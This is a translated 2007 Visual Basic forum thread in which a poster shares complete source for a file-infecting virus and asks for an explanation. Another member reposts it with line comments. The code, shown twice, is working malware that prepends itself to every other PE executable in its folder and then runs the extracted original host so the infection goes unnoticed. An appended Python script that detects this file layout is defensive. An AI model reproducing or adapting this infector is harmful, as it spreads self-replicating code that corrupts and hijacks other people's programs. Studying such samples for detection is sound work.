Could an expert please explain the following virus code and give detailed comments? Thanks!
vb吧 (VB forum)
level 1
瘤魔王 (OP)
Option Explicit
Private Victim As String
Private HostLen As Long
Private vbArray() As Byte
Private hArray() As Byte
Private lenght As Long
Const MySize As Integer = 14336
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private iResult As Long
Private hProg As Long
Private idProg As Long
Private iExit As Long
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF

Private Sub Command1_Click()
    Dim i As Long
    On Error GoTo vbVerror
    Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read _
        As #1
    ReDim vbArray(MySize)
    Get #1, 1, vbArray
    Close #1
    Victim = Dir(App.Path & "\" & "*.EXE")
    While Victim <> ""
        If Format(Victim, ">") <> Format(App.EXEName & ".EXE", ">") Then
            Open App.Path & "\" & Victim For Binary Access Read As #1
            ReDim hArray(LOF(1))
            Get #1, 1, hArray
            Close #1
            If hArray(&H69) <> &H4D Then
                i = hArray(&H3C)
                If hArray(i) = &H50 Then
                    Open App.Path & "\" & Victim For Binary Access Write As #1
                    Put #1, , vbArray
                    Put #1, MySize, hArray
                    Close #1
                End If
            End If
        End If
        Victim = Dir()
    Wend
    Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1
    lenght = LOF(1) - MySize
    If lenght <> 0 Then
        ReDim vbArray(lenght - 1)
        Get #1, MySize, vbArray
        Close #1
        Open App.Path & "\" & App.EXEName & ".eve" For Binary Access Write As #1
        Put #1, , vbArray
        Close #1
        idProg = Shell(App.Path & "\" & App.EXEName & ".eve", vbNormalFocus)
        hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg)
        GetExitCodeProcess hProg, iExit
        Do While iExit = STILL_ACTIVE
            DoEvents
            GetExitCodeProcess hProg, iExit
        Loop
        Kill App.Path & "\" & App.EXEName & ".eve"
    Else
        Close #1
    End If
    End
vbVerror:
End Sub
2007-04-15 12:04 #1
level 1
Option Explicit
Private Victim As String
Private HostLen As Long
Private vbArray() As Byte
Private hArray() As Byte
Private lenght As Long
Const MySize As Integer = 14336
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private iResult As Long
Private hProg As Long
Private idProg As Long
Private iExit As Long
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF

Private Sub Command1_Click()
    Dim i As Long
    On Error GoTo vbVerror
    Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read _
        As #1
    ReDim vbArray(MySize)
    Get #1, 1, vbArray
    Close #1 ' Read itself into memory
    Victim = Dir(App.Path & "\" & "*.EXE") ' Loop over all the exe files in the directory it runs from
    While Victim <> ""
        If Format(Victim, ">") <> Format(App.EXEName & ".EXE", ">") Then ' Is it itself? If not, read the file into memory
            Open App.Path & "\" & Victim For Binary Access Read As #1
            ReDim hArray(LOF(1))
            Get #1, 1, hArray
            Close #1
            ' Why 69H? I think it should be 1H; this should be checking for the "MZ" header. Or is it something else?
            ' I checked RAR self-extracting archives, DLL files and *.com files, and none of them has 4DH there.
            ' I hope other experts can look into it.
            If hArray(&H69) <> &H4D Then
                i = hArray(&H3C) ' Read the address of the PE header
                If hArray(i) = &H50 Then ' Check the PE signature
                    Open App.Path & "\" & Victim For Binary Access Write As #1
                    Put #1, , vbArray
                    Put #1, MySize, hArray
                    Close #1 ' Heh~~ writes itself into the target file
                End If
            End If
        End If
        Victim = Dir() ' Continue looking for the next target
    Wend
    Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1
    lenght = LOF(1) - MySize
    If lenght <> 0 Then ' Why "not equal to 0" rather than "greater than 0"?
        ReDim vbArray(lenght - 1)
        Get #1, MySize, vbArray ' Read in the part beyond that size
        Close #1
        Open App.Path & "\" & App.EXEName & ".eve" For Binary Access Write As #1
        Put #1, , vbArray ' Write it out
        Close #1 ' This part is a bit confusing; I'll think about it some more later
        idProg = Shell(App.Path & "\" & App.EXEName & ".eve", vbNormalFocus) ' Start the process and return its PID
        hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg)
        GetExitCodeProcess hProg, iExit
        Do While iExit = STILL_ACTIVE
            DoEvents
            GetExitCodeProcess hProg, iExit
        Loop ' Keep waiting until the process exits
        Kill App.Path & "\" & App.EXEName & ".eve" ' Delete it
    Else
        Close #1
    End If
    End
vbVerror:
End Sub
2007-04-15 14:04 #2
level 1
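瘤魔王 (OP)
Thanks, luckclouds. There is still most of it that I don't understand, but I will work hard at it! One more question: where is the core part of this virus?? What consequences will it cause?? After reading it I couldn't find the core part at all.
2007-04-15 15:04 #3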
level 1
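瘤魔王 (OP)
Thanks, luckclouds, although there is still a lot I didn't understand. But I will work hard at it! I'd also like to ask: which part is the core of this virus?? What consequences will it cause once it runs??
2007-04-15 15:04 #4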
level 1
瘤魔王 (OP)
1
2007-04-15 15:04 #5
level 0
It just infects exe files.
2007-04-16 01:04 #6
level 1
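This is a piece of VB code used to find and infect other executable files. It carries out the infection by reading itself and inserting itself into other files.
2023-04-17 14:04 #7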
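A defender-side check for the file layout this thread describes, added here as an example and not part of any post: it flags a PE file that carries a second complete PE image at the offset implied by the `MySize` constant in the posted code, and also generalises to any embedded PE offset. The offset assumes VB's 1-based file positions; the function names and sample bytes are constructed for illustration.

```python
import struct

MY_SIZE = 14336            # MySize constant from the posted code
HOST_OFFSET = MY_SIZE - 1  # assumption: VB positions are 1-based, so Put #1, MySize lands at byte 14335

def is_pe_image(buf: bytes, base: int = 0) -> bool:
    """True if a DOS header at `base` leads to a valid 'PE\\0\\0' signature."""
    if buf[base:base + 2] != b"MZ" or len(buf) < base + 0x40:
        return False
    (e_lfanew,) = struct.unpack_from("<I", buf, base + 0x3C)
    sig = base + e_lfanew
    return buf[sig:sig + 4] == b"PE\x00\x00"

def looks_prepended(buf: bytes, host_offset: int = HOST_OFFSET) -> bool:
    """Flag a PE file that carries a second complete PE image at host_offset."""
    return is_pe_image(buf, 0) and is_pe_image(buf, host_offset)

def find_embedded_pe(buf: bytes, start: int = 0x40) -> list:
    """Generalisation: offsets of every embedded PE image after the first header."""
    hits, pos = [], buf.find(b"MZ", start)
    while pos != -1:
        if is_pe_image(buf, pos):
            hits.append(pos)
        pos = buf.find(b"MZ", pos + 1)
    return hits

def make_pe_stub(size: int, lfanew: int = 0x80) -> bytes:
    """Constructed sample: zero bytes plus MZ, e_lfanew and PE signature only."""
    buf = bytearray(size)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, lfanew)
    buf[lfanew:lfanew + 4] = b"PE\x00\x00"
    return bytes(buf)

# Constructed samples (header markers only, not real executables)
CLEAN = make_pe_stub(4096)
INFECTED = make_pe_stub(HOST_OFFSET) + CLEAN  # same layout as an infected file

if __name__ == "__main__":
    for name, data in (("clean", CLEAN), ("infected-layout", INFECTED)):
        print(name, looks_prepended(data), find_embedded_pe(data))
```

A second PE image inside a file is only a triage signal, since installers and self-extracting archives also embed executables.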